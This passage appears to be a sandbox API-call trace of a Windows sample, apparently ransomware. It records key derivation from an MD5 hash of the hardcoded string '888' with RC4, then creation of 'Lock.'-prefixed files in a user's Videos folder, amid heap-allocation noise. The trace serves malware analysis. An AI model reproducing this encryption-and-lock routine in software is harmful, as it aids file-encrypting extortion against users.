lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.055] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0214.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0214.055] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.055] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0214.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0214.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0214.056] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c6e8) returned 1 [0214.056] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0214.056] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.057] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.057] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab698, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0214.057] CryptCreateHash (in: hProv=0xa7c6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0214.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.057] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0214.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.058] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.058] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab458, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0214.058] CryptHashData (hHash=0x9e1db8, pbData=0x2a726a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0214.060] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.060] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.060] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.060] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0214.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab728, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0214.060] CryptDeriveKey (in: hProv=0xa7c6e8, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0214.060] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.060] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0214.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0214.060] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0214.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/SpSJ7tN62PCD2h Y" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0214.061] GetLastError () returned 0x5 [0214.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0214.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0214.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0214.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0214.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0214.062] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b20 | out: hHeap=0x2af0000) returned 1 [0214.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0214.062] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.SpSJ7tN62PCD2h Y" (normalized: "c:\\users\\fd1hvy\\videos\\lock.spsj7tn62pcd2h y"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0214.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0214.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0214.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0214.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0214.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0214.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.066] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.066] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0214.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0214.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0214.067] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0214.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0214.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0214.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.068] 